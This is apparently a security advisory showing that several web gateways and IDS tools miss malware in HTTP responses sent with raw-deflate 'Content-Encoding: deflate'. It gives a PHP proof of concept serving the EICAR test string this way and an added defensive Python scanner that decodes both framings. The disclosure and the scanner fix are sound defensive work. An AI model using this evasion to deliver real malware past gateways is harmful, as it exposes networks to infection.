Please note that republishing this article in full or in part is only allowed under the conditions described here.
From the product description of Sophos UTM Web Protection:
Our Secure Web Gateway prevents malware infections and gives you control
over your employees’ web use. Spyware and viruses are stopped before they
can enter the network. And, you can quickly create policies that set where and
how employees spend time online.
Highlights: ...Prevent infection with dual, independent antivirus engines
<?php
header('HTTP/1.0 200 ok');
header('Content-type: text/plain');
header('Content-Encoding: deflate');
// EICAR compressed with RFC 1951 (raw deflate)
echo base64_decode('izD1VwxQdXAMiDaJCYiKMDXRCIjTNHd21jSvVXH1dHYM0g0OcfRzcQxy0XX0C/EM8wwKDdYNcQ0O0XXz9HFVVPHQ9tACAA==');
exit(0);
?>
33691: HTTP responses which contain malware and are delivered with “Content-Encoding: deflate” are not caught by virus scanners
Please note that the Zscaler and Comodo Web Inspector URL scanners can also be easily bypassed the same way. VirusTotal and Intrusion Detection Systems (IDS) like Bro, Snort, Suricata and probably other IDS and firewalls can be bypassed in similar ways.
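Scanner-side handling of this case, as an added example that is not part of the original article: HTTP specifies the zlib format (RFC 1950) for "Content-Encoding: deflate", but clients also accept the raw RFC 1951 stream used in the PHP test above, so a content scanner has to try both framings and fail closed when neither decodes. MARKER, wire_forms, decode_deflate and scan are hypothetical names, and the payload is a constructed stand-in rather than a real signature.

```python
import zlib

MARKER = b"CONSTRUCTED-TEST-MARKER"  # constructed stand-in for a scanner signature


def wire_forms(data: bytes) -> dict:
    """Build both framings a server may send as 'deflate' (sample builder)."""
    c = zlib.compressobj(9, zlib.DEFLATED, -zlib.MAX_WBITS)  # negative wbits: bare RFC 1951
    return {"zlib": zlib.compress(data), "raw": c.compress(data) + c.flush()}


def decode_deflate(body: bytes, limit: int = 8 * 1024 * 1024):
    """Decode a 'Content-Encoding: deflate' body the way lenient clients do.

    Tries the zlib wrapper (RFC 1950) first, then raw deflate (RFC 1951).
    Returns (decoded, variant); raises ValueError so callers can fail closed.
    """
    for variant, wbits in (("zlib", zlib.MAX_WBITS), ("raw", -zlib.MAX_WBITS)):
        d = zlib.decompressobj(wbits)
        try:
            out = d.decompress(body, limit)  # cap output to bound memory use
        except zlib.error:
            continue  # wrong framing for this variant, try the next one
        if d.unconsumed_tail:
            raise ValueError("decoded body exceeds scan limit")
        if d.eof:
            return out, variant
    raise ValueError("body is neither zlib nor raw deflate")


def scan(body: bytes, content_encoding: str) -> str:
    """Return 'clean' or 'block'; a body the scanner cannot decode is blocked."""
    if content_encoding.strip().lower() == "deflate":
        try:
            body, _ = decode_deflate(body)
        except ValueError:
            return "block"
    return "block" if MARKER in body else "clean"


if __name__ == "__main__":
    payload = b"header " + MARKER + b" trailer"
    for name, wire in wire_forms(payload).items():
        print(name, decode_deflate(wire)[1], scan(wire, "deflate"))
```

A scanner that only attempts the RFC 1950 framing would raise on the "raw" form and, if it treats decode errors as "nothing to scan", pass the body through unscanned.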